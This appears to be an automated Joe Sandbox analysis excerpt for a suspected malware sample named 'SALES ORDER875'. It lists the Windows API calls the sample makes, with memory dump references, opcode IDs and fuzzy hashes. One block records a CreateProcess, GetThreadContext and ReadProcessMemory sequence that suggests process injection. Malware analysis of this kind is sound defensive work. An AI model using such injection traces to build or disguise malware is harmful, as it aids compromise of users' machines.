                                                                                                                                                                                      • Part of subcall function 00381BC3: MapVirtualKeyW.USER32(000000A0,00000000), ref: 00381C07
                                                                                                                                                                                      • Part of subcall function 00381BC3: MapVirtualKeyW.USER32(000000A1,00000000), ref: 00381C12
                                                                                                                                                                                      • Part of subcall function 00381BC3: MapVirtualKeyW.USER32(00000011,00000000), ref: 00381C1A
                                                                                                                                                                                      • Part of subcall function 00381BC3: MapVirtualKeyW.USER32(00000012,00000000), ref: 00381C22
                                                                                                                                                                                      • Part of subcall function 00381B4A: RegisterWindowMessageW.USER32(00000004,?,003812C4), ref: 00381BA2
                                                                                                                                                                                    • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 0038136A
                                                                                                                                                                                    • OleInitialize.OLE32 ref: 00381388
                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000,00000000), ref: 003C24AB
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1828908824.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1828886853.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829201961.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829357746.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_380000_SALES ORDER875.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 1986988660-0
                                                                                                                                                                                    • Opcode ID: 9204c03bead19dc38df24cc73aff4a5dc6c3f37ad4cc12a612be89673b280b76
                                                                                                                                                                                    • Instruction ID: c6e5786d9b25f134db958dcbaddc6c04948081bb4c9f25e30adecb31d3111776
                                                                                                                                                                                    • Opcode Fuzzy Hash: 9204c03bead19dc38df24cc73aff4a5dc6c3f37ad4cc12a612be89673b280b76
                                                                                                                                                                                    • Instruction Fuzzy Hash: 3371ACB4911308AFC785EF79AD857A53AE4BB89346714867AD40ACB273FB348845CF4C
                                                                                                                                                                                    APIs
                                                                                                                                                                                      • Part of subcall function 00383923: Shell_NotifyIconW.SHELL32(00000001,?), ref: 00383A04
                                                                                                                                                                                    • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 003EC259
                                                                                                                                                                                    • KillTimer.USER32(?,00000001,?,?), ref: 003EC261
                                                                                                                                                                                    • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 003EC270
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1828908824.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1828886853.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829201961.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829357746.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_380000_SALES ORDER875.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: IconNotifyShell_Timer$Kill
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 3500052701-0
                                                                                                                                                                                    • Opcode ID: b4ef0c507e625706c47fc34866f5a2d8945bd4e7daf62373874b9284d08db96a
                                                                                                                                                                                    • Instruction ID: d6d360e4dafce6f073632ae0834afac5d4d912b34763b1e883c7d38a1eff7d51
                                                                                                                                                                                    • Opcode Fuzzy Hash: b4ef0c507e625706c47fc34866f5a2d8945bd4e7daf62373874b9284d08db96a
                                                                                                                                                                                    • Instruction Fuzzy Hash: D931E570904394AFEF239F748895BEBBBEC9F02304F001499D6DA97282C3745A85CB55
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • CloseHandle.KERNELBASE(00000000,00000000,?,?,003B85CC,?,00448CC8,0000000C), ref: 003B8704
                                                                                                                                                                                    • GetLastError.KERNEL32(?,003B85CC,?,00448CC8,0000000C), ref: 003B870E
                                                                                                                                                                                    • __dosmaperr.LIBCMT ref: 003B8739
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1828908824.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1828886853.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829201961.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829357746.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_380000_SALES ORDER875.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: CloseErrorHandleLast__dosmaperr
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 2583163307-0
                                                                                                                                                                                    • Opcode ID: 04e60f4e786a34f0e8c18957ef0949f8e69e3fbb76d8648369e58a59bef94603
                                                                                                                                                                                    • Instruction ID: 49591f773dee6d7140d6016f263b58b860cde5e2ba6d4477508d1348a697b0fe
                                                                                                                                                                                    • Opcode Fuzzy Hash: 04e60f4e786a34f0e8c18957ef0949f8e69e3fbb76d8648369e58a59bef94603
                                                                                                                                                                                    • Instruction Fuzzy Hash: 6E01083660562026D6677334A8467EE678D4B9277CF3A0119EB189F9D2DEA0CC81C194
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • TranslateMessage.USER32(?), ref: 0038DB7B
                                                                                                                                                                                    • DispatchMessageW.USER32(?), ref: 0038DB89
                                                                                                                                                                                    • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0038DB9F
                                                                                                                                                                                    • Sleep.KERNEL32(0000000A), ref: 0038DBB1
                                                                                                                                                                                    • TranslateAcceleratorW.USER32(?,?,?), ref: 003D1CC9
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1828908824.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1828886853.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829201961.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829357746.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_380000_SALES ORDER875.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Message$Translate$AcceleratorDispatchPeekSleep
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 3288985973-0
                                                                                                                                                                                    • Opcode ID: cfa25611a35751f7f6487351613eb65966cd9d0fbf7582a6bef56abfd3b9c465
                                                                                                                                                                                    • Instruction ID: 22004f1b242ea06926a2cf8b05bd05f8ce9deae27ebf0fdaeb950f193d3bc6de
                                                                                                                                                                                    • Opcode Fuzzy Hash: cfa25611a35751f7f6487351613eb65966cd9d0fbf7582a6bef56abfd3b9c465
                                                                                                                                                                                    • Instruction Fuzzy Hash: 8EF08231644341ABEB31DB60DC89FEA73ADEB44311F108929E61AC30D0DB709448CB19
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • __Init_thread_footer.LIBCMT ref: 003917F6
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1828908824.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1828886853.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829201961.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829357746.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_380000_SALES ORDER875.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Init_thread_footer
                                                                                                                                                                                    • String ID: CALL
                                                                                                                                                                                    • API String ID: 1385522511-4196123274
                                                                                                                                                                                    • Opcode ID: b6417cd37c880bf88f1b363b65c4b8d6f1d16a60c2a44ea81c97a85eebef6e40
                                                                                                                                                                                    • Instruction ID: 16f0b975f2cfbdeafa22c55c1b0df372f779bea0acdc8c80587eb3272d0c2c58
                                                                                                                                                                                    • Opcode Fuzzy Hash: b6417cd37c880bf88f1b363b65c4b8d6f1d16a60c2a44ea81c97a85eebef6e40
                                                                                                                                                                                    • Instruction Fuzzy Hash: E922BE756083029FCB16DF14D481B2ABBF5BF8A304F15896EF4969B362D731E845CB82
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,0038949C,?,00008000), ref: 00385773
                                                                                                                                                                                    • CreateFileW.KERNEL32(?,C0000000,00000007,00000000,00000004,00000080,00000000,?,?,?,0038949C,?,00008000), ref: 003C4052
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1828908824.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1828886853.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829201961.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829357746.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_380000_SALES ORDER875.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: CreateFile
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 823142352-0
                                                                                                                                                                                    • Opcode ID: dc530addd036d3b43b1c14f4c1f7fcbec9d4b53779b7547392e06985b25508dc
                                                                                                                                                                                    • Instruction ID: 404e67e75f7c1efe54dffe0cb6efb10195d90de03849ba9984ad47a820a9b613
                                                                                                                                                                                    • Opcode Fuzzy Hash: dc530addd036d3b43b1c14f4c1f7fcbec9d4b53779b7547392e06985b25508dc
                                                                                                                                                                                    • Instruction Fuzzy Hash: 2C015231185325B6E7315A2ADC0EFA77F98EF027B0F15C314BA9C5A1E0C7B45854CB94
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • CreateProcessW.KERNELBASE(?,00000000), ref: 01A8F78B
                                                                                                                                                                                    • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 01A8F821
                                                                                                                                                                                    • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 01A8F843
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1832043021.0000000001A8D000.00000040.00000020.00020000.00000000.sdmp, Offset: 01A8D000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_1a8d000_SALES ORDER875.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Process$ContextCreateMemoryReadThreadWow64
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 2438371351-0
                                                                                                                                                                                    • Opcode ID: 6ff7500a3617197a005732162d507dd4d37460c8dcbf147a4ae2be43d63b6423
                                                                                                                                                                                    • Instruction ID: 17766925877b26f08db5a3058eedc9ff7356a854efb9058254085ded41e55732
                                                                                                                                                                                    • Opcode Fuzzy Hash: 6ff7500a3617197a005732162d507dd4d37460c8dcbf147a4ae2be43d63b6423
                                                                                                                                                                                    • Instruction Fuzzy Hash: 4B12DE24E24658C6EB24DF64D8507DEB232EF68300F1090E9910DEB7A5E77A4F81CF5A
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • CharLowerBuffW.USER32(?,?), ref: 003EF314
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1828908824.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1828886853.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829201961.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829357746.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_380000_SALES ORDER875.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: BuffCharLower
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 2358735015-0
                                                                                                                                                                                    • Opcode ID: bd83627e724e3eed3df6dbfb9c7aaa5e2b9a301715e469ae3b7bbddb065b4087
                                                                                                                                                                                    • Instruction ID: 5ddb6ffa209c02aa46db0ec4c52350056a4d061f31b07bcefa02b675ca692f79
                                                                                                                                                                                    • Opcode Fuzzy Hash: bd83627e724e3eed3df6dbfb9c7aaa5e2b9a301715e469ae3b7bbddb065b4087
                                                                                                                                                                                    • Instruction Fuzzy Hash: A341B5B6A00215AFCB12EF65C8409AF73B9EF44314B15863EE5569B2D1DBB0EE018B50
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1828908824.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1828886853.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829201961.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829357746.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_380000_SALES ORDER875.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: ProtectVirtual
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 544645111-0
                                                                                                                                                                                    • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                                                                                                                                    • Instruction ID: 130e6cf2b468b984706c41daa5d049ec43c210177c67557ddd2ff59a89965f04
                                                                                                                                                                                    • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                                                                                                                                    • Instruction Fuzzy Hash: 6431D275A0010ADFDB1ADF59D480969FBA6FF49300B25C6A5E809CB65AD731EDC1CBC0
                                                                                                                                                                                    APIs
                                                                                                                                                                                      • Part of subcall function 00384E90: LoadLibraryA.KERNEL32(kernel32.dll,?,?,00384EDD,?,00451418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00384E9C
                                                                                                                                                                                      • Part of subcall function 00384E90: GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00384EAE
                                                                                                                                                                                      • Part of subcall function 00384E90: FreeLibrary.KERNEL32(00000000,?,?,00384EDD,?,00451418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00384EC0
                                                                                                                                                                                    • LoadLibraryExW.KERNEL32(?,00000000,00000002,?,00451418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00384EFD
                                                                                                                                                                                      • Part of subcall function 00384E59: LoadLibraryA.KERNEL32(kernel32.dll,?,?,003C3CDE,?,00451418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00384E62
                                                                                                                                                                                      • Part of subcall function 00384E59: GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00384E74
                                                                                                                                                                                      • Part of subcall function 00384E59: FreeLibrary.KERNEL32(00000000,?,?,003C3CDE,?,00451418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00384E87
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1828908824.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1828886853.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829201961.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829357746.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_380000_SALES ORDER875.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Library$Load$AddressFreeProc
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 2632591731-0
                                                                                                                                                                                    • Opcode ID: 3f1453c2ca7cbe6781a3a6aacb0eca3589b208c0eec9cd2b369bd76531540094
                                                                                                                                                                                    • Instruction ID: 9daba28435c2632d84a27a3172ff381c2dadf92228dc779c4e9f231604810860
                                                                                                                                                                                    • Opcode Fuzzy Hash: 3f1453c2ca7cbe6781a3a6aacb0eca3589b208c0eec9cd2b369bd76531540094
                                                                                                                                                                                    • Instruction Fuzzy Hash: 6E11E332640306ABCF16BF60DC02FAD77A5AF80B15F20846EF642AE5C1EE70EE459750
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1828908824.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1828886853.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829201961.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829357746.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_380000_SALES ORDER875.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: __wsopen_s
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 3347428461-0
                                                                                                                                                                                    • Opcode ID: f29fe201158a66162ea403be463ccf868100b12b502871323b47339e04699133
                                                                                                                                                                                    • Instruction ID: f3d3dc8782fcb00a00fe648b4b58a7b838fa7f87829384239057f03d71a59186
                                                                                                                                                                                    • Opcode Fuzzy Hash: f29fe201158a66162ea403be463ccf868100b12b502871323b47339e04699133
                                                                                                                                                                                    • Instruction Fuzzy Hash: EE11187590420AAFCF06DF59E941ADA7BF9EF48314F114069FD08AB312DB31EA11CBA5
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,00382B12,00451418,?,?,?,?,?,?,?,00381CAD,?), ref: 00381D11
                                                                                                                                                                                      • Part of subcall function 00386B57: _wcslen.LIBCMT ref: 00386B6A
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1828908824.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1828886853.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829201961.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829357746.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_380000_SALES ORDER875.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: FullNamePath_wcslen
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 4019309064-0
                                                                                                                                                                                    • Opcode ID: 0c5f32065a17c45c01c53339f7bda172e8170de502aaaf438517cb9b9380ec59
                                                                                                                                                                                    • Instruction ID: 5d5f799394dd0b5b5ca4600dfad824e192b3e80c688edb26d6c4dae1f3a9c082
                                                                                                                                                                                    • Opcode Fuzzy Hash: 0c5f32065a17c45c01c53339f7bda172e8170de502aaaf438517cb9b9380ec59
                                                                                                                                                                                    • Instruction Fuzzy Hash: 55118871A003099ACB13FBA4D946FDA73BCAF08344F1041E6B995DB251DB74EB889715
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1828908824.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1828886853.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829201961.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829357746.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_380000_SALES ORDER875.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                    • Opcode ID: d6c69ec2a70ac845cc05b5f137181c3f07394ab8b33ef369e8c7ef627d5c9574
                                                                                                                                                                                    • Instruction ID: 4dac4924397bb9bfa02f8f774631d9c367e25630db7e81e8b115c6972f022695
                                                                                                                                                                                    • Opcode Fuzzy Hash: d6c69ec2a70ac845cc05b5f137181c3f07394ab8b33ef369e8c7ef627d5c9574
                                                                                                                                                                                    • Instruction Fuzzy Hash: 75F0F432510A14AAD6333A699C05B9B339CDF53338F110F19F6259A9E2DB78D80186A9
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1828908824.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1828886853.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829201961.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829357746.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_380000_SALES ORDER875.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: _wcslen
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 176396367-0
                                                                                                                                                                                    • Opcode ID: 98ad5ad2a30495acd569bab0290c22198dc8be697418d8b11e2c8fcba327d5f9
                                                                                                                                                                                    • Instruction ID: 9efaeab24b0117838e759684ee1d33d55369140c3b32c8376d48369ae2403faa
                                                                                                                                                                                    • Opcode Fuzzy Hash: 98ad5ad2a30495acd569bab0290c22198dc8be697418d8b11e2c8fcba327d5f9
                                                                                                                                                                                    • Instruction Fuzzy Hash: FBF0C8B3600700AED7169F28D806F67BB98EF44760F14852AF619CF1D1DB71E51487A4
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • RtlAllocateHeap.NTDLL(00000000,?,00451444,?,0039FDF5,?,?,0038A976,00000010,00451440,003813FC,?,003813C6,?,00381129), ref: 003B3852
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1828908824.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1828886853.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829201961.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829357746.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_380000_SALES ORDER875.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: AllocateHeap
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 1279760036-0
                                                                                                                                                                                    • Opcode ID: 2ac5c6f2889b96928fbfc919b13c163bea990bf550d51fe8dfeada6533619f4e
                                                                                                                                                                                    • Instruction ID: 8a3907bdf487601dd39400a53358955f87c98244803acdf111bf5877e1776c2a
                                                                                                                                                                                    • Opcode Fuzzy Hash: 2ac5c6f2889b96928fbfc919b13c163bea990bf550d51fe8dfeada6533619f4e
                                                                                                                                                                                    • Instruction Fuzzy Hash: E3E0E5311402346AE72326AA9C00BDA3648EF827B8F070130BE04D6C91DB50DE0582E3
                                                                                                                                                                                    APIs
